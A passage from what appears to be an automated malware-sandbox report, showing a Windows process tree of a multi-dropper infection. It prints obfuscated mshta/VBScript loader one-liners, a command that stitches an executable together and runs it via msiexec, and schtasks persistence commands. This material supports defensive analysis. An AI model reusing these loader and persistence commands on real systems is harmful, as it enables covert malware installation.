                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Traffic\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,9403913921633612379,1120878466398652403,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Traffic\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10372_1794557714" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2512 /prefetch:1
                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                                                                  PID:4264
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" --type=gpu-process --field-trial-handle=1628,9403913921633612379,1120878466398652403,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Traffic\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10372_1794557714" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3056 /prefetch:2
                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                    PID:10504
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,9403913921633612379,1120878466398652403,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Traffic\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10372_1794557714" --mojo-platform-channel-handle=3116 /prefetch:8
                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                      PID:3696
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,9403913921633612379,1120878466398652403,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Traffic\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10372_1794557714" --mojo-platform-channel-handle=856 /prefetch:8
                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                        PID:8328
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,9403913921633612379,1120878466398652403,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Traffic\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10372_1794557714" --mojo-platform-channel-handle=3624 /prefetch:8
                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                          PID:1564
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,9403913921633612379,1120878466398652403,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Traffic\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10372_1794557714" --mojo-platform-channel-handle=1552 /prefetch:8
                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                            PID:10860
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,9403913921633612379,1120878466398652403,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Traffic\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10372_1794557714" --mojo-platform-channel-handle=2496 /prefetch:8
                                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                                              PID:10748
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                      PID:8188
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                      PID:8180
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\7tii75fVLYgCiHA7pArVZSx6.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\7tii75fVLYgCiHA7pArVZSx6.exe"
                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                    PID:5200
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\qRCJ5z3O_OZDAsMdsGOPOgid.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\qRCJ5z3O_OZDAsMdsGOPOgid.exe"
                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                    PID:5304
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\6uAQNxQmVWeM3CFC9BHfN0LW.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\6uAQNxQmVWeM3CFC9BHfN0LW.exe"
                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                    PID:5292
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\3BihL3gYR5REuUiOPCPvqbvd.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\3BihL3gYR5REuUiOPCPvqbvd.exe"
                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                    PID:5184
                                                                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                      #cmd
                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                        PID:6404
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\WnRFolatYszOvLoddrzL2mNF.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\WnRFolatYszOvLoddrzL2mNF.exe"
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                      PID:5828
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\zhWzACbpiLgUHZxZicbuIUPB.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\zhWzACbpiLgUHZxZicbuIUPB.exe"
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                      PID:6060
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\etvbv2hQIOdepKWS6QFmWo4O.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\etvbv2hQIOdepKWS6QFmWo4O.exe"
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                        PID:4216
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 480
                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                          PID:6856
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\6eqnuzfsi0MtzBEZ5pmR7feK.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\6eqnuzfsi0MtzBEZ5pmR7feK.exe"
                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                          PID:5100
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\6eqnuzfsi0MtzBEZ5pmR7feK.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\6eqnuzfsi0MtzBEZ5pmR7feK.exe"
                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                              PID:7212
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\I3na4bnIDkZSmYXYnWt9XNxM.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\I3na4bnIDkZSmYXYnWt9XNxM.exe"
                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                              PID:4820
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\I3na4bnIDkZSmYXYnWt9XNxM.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\I3na4bnIDkZSmYXYnWt9XNxM.exe"
                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                PID:6632
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\EoVz33ZeLdMvVVNgy0BiwO_t.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\EoVz33ZeLdMvVVNgy0BiwO_t.exe"
                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                              PID:6116
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\jaetAH5IzLax1fvs1DcgnfRE.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\jaetAH5IzLax1fvs1DcgnfRE.exe"
                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                              PID:5924
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\ywviaNr4n2EvD9ELOcWDDzVk.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\ywviaNr4n2EvD9ELOcWDDzVk.exe"
                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                              PID:5916
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\Jo5oz5XZxESDUiWj0kEKyUGq.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\Jo5oz5XZxESDUiWj0kEKyUGq.exe"
                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                              PID:5176
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4440501.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4440501.exe"
                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                  PID:7400
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\4440501.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\4440501.exe"
                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                    PID:3032
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\6950206.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\6950206.exe"
                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                                    PID:7428
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\6950206.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\6950206.exe"
                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                                    PID:2588
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1911172.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1911172.exe"
                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                    PID:4012
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1911172.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1911172.exe"
                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                    PID:7792
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8460194.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8460194.exe"
                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                    PID:2248
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1381981.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1381981.exe"
                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                    PID:860
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1381981.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1381981.exe"
                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                      PID:8072
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\127481.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\127481.exe"
                                                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                                                        PID:7944
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\700224.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\700224.exe"
                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                            PID:6436
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" VBsCrIpT: close ( CreatEobJecT ( "Wscript.sHElL"). RUn ( "cmd.eXe /q /C Type ""C:\Users\Admin\AppData\Roaming\700224.exe"" > IjVy1zQHC.exE && STARt IjVY1ZQHC.exe -PcQVxYt3abConFhE00GVx & IF """"== """" for %f In ( ""C:\Users\Admin\AppData\Roaming\700224.exe"" ) do taskkill /f -Im ""%~Nxf"" " , 0 ,TRUe ) )
                                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                                PID:2256
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /q /C Type "C:\Users\Admin\AppData\Roaming\700224.exe" > IjVy1zQHC.exE && STARt IjVY1ZQHC.exe -PcQVxYt3abConFhE00GVx & IF ""== "" for %f In ( "C:\Users\Admin\AppData\Roaming\700224.exe" ) do taskkill /f -Im "%~Nxf"
                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                    PID:8884
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                      taskkill /f -Im "700224.exe"
                                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                      PID:7376
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\8289412.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\8289412.exe"
                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                  PID:824
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\127481.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\127481.exe"
                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                  PID:7988
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\5866650.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\5866650.exe"
                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                      PID:3696
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VBsCrIpT: close ( CreatEobJecT ( "Wscript.sHElL"). RUn ( "cmd.eXe /q /C Type ""C:\Users\Admin\AppData\Roaming\5866650.exe"" > IjVy1zQHC.exE && STARt IjVY1ZQHC.exe -PcQVxYt3abConFhE00GVx & IF """"== """" for %f In ( ""C:\Users\Admin\AppData\Roaming\5866650.exe"" ) do taskkill /f -Im ""%~Nxf"" " , 0 ,TRUe ) )
                                                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                                                          PID:9000
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /q /C Type "C:\Users\Admin\AppData\Roaming\5866650.exe" > IjVy1zQHC.exE && STARt IjVY1ZQHC.exe -PcQVxYt3abConFhE00GVx & IF ""== "" for %f In ( "C:\Users\Admin\AppData\Roaming\5866650.exe" ) do taskkill /f -Im "%~Nxf"
                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                              PID:188
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                taskkill /f -Im "5866650.exe"
                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                PID:4972
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3465416.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\3465416.exe"
                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                            PID:2260
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\8460194.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\8460194.exe"
                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                          PID:3888
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\4NxYBhPWNkJ1l4HsVQuWXlpy.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\4NxYBhPWNkJ1l4HsVQuWXlpy.exe"
                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                        PID:5168
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\XQeZZQ9AuxQFyzmGSX5vdfN8.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\XQeZZQ9AuxQFyzmGSX5vdfN8.exe"
                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                        PID:5152
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\tfqDs5oaIGa6K70DgwhJE4FK.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\tfqDs5oaIGa6K70DgwhJE4FK.exe"
                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                          PID:6148
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\7xWtmj08eJBnb2bsqHrnQtxa.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\7xWtmj08eJBnb2bsqHrnQtxa.exe"
                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                            PID:6232
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\doUsbyTrkZ4xAwWgzbBPgmCD.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\doUsbyTrkZ4xAwWgzbBPgmCD.exe"
                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                              PID:6188
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\SPZy5HB9JmNtYTAfSo5ZYJdA.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\SPZy5HB9JmNtYTAfSo5ZYJdA.exe"
                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                PID:6416
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\Sc9uMnQuoYkOvsBpzpxDWjiN.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\Sc9uMnQuoYkOvsBpzpxDWjiN.exe"
                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                  PID:6472
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VBScrIPt: cloSE ( cREateoBJeCT( "wsCriPT.ShELl" ). rUn ( "C:\Windows\system32\cmd.exe /q /R tyPE ""C:\Users\Admin\Pictures\Adobe Films\Sc9uMnQuoYkOvsBpzpxDWjiN.exe"" >OO~~L.EXe && stArt OO~~L.EXe /pPjPGJptW_~SKzEzDIcpQmqTlbw & IF """"== """" for %Q IN ( ""C:\Users\Admin\Pictures\Adobe Films\Sc9uMnQuoYkOvsBpzpxDWjiN.exe"" ) do taskkill /f -IM ""%~NXQ"" " , 0 , True ) )
                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6900
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /q /R tyPE "C:\Users\Admin\Pictures\Adobe Films\Sc9uMnQuoYkOvsBpzpxDWjiN.exe" >OO~~L.EXe && stArt OO~~L.EXe /pPjPGJptW_~SKzEzDIcpQmqTlbw & IF ""== "" for %Q IN ( "C:\Users\Admin\Pictures\Adobe Films\Sc9uMnQuoYkOvsBpzpxDWjiN.exe" ) do taskkill /f -IM "%~NXQ"
                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                          PID:6260
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\OO~~L.EXe
                                                                                                                                                                                                                                                                                                                                                            OO~~L.EXe /pPjPGJptW_~SKzEzDIcpQmqTlbw
                                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                                              PID:4800
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VBScrIPt: cloSE ( cREateoBJeCT( "wsCriPT.ShELl" ). rUn ( "C:\Windows\system32\cmd.exe /q /R tyPE ""C:\Users\Admin\AppData\Local\Temp\OO~~L.EXe"" >OO~~L.EXe && stArt OO~~L.EXe /pPjPGJptW_~SKzEzDIcpQmqTlbw & IF ""/pPjPGJptW_~SKzEzDIcpQmqTlbw ""== """" for %Q IN ( ""C:\Users\Admin\AppData\Local\Temp\OO~~L.EXe"" ) do taskkill /f -IM ""%~NXQ"" " , 0 , True ) )
                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:7932
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /q /R tyPE "C:\Users\Admin\AppData\Local\Temp\OO~~L.EXe" >OO~~L.EXe && stArt OO~~L.EXe /pPjPGJptW_~SKzEzDIcpQmqTlbw & IF "/pPjPGJptW_~SKzEzDIcpQmqTlbw "== "" for %Q IN ( "C:\Users\Admin\AppData\Local\Temp\OO~~L.EXe" ) do taskkill /f -IM "%~NXQ"
                                                                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:8692
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vbscrIpT: CLosE ( creAteobJect ( "wsCrIPt.Shell" ). Run ( "cMD.eXe /C EchO | Set /p = ""MZ"" >76G0.lSN & CoPY /y /b 76G0.LSN + PdlGFK.Jm + uYpSK.eVi + Dn3ORHj.P_h + 5QkEjQH.M + eREnh.zX J7WZl2.Bu6 & stART msiexec.exe /Y .\J7wZl2.BU6 " , 0 ,TRUe ) )
                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:3012
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
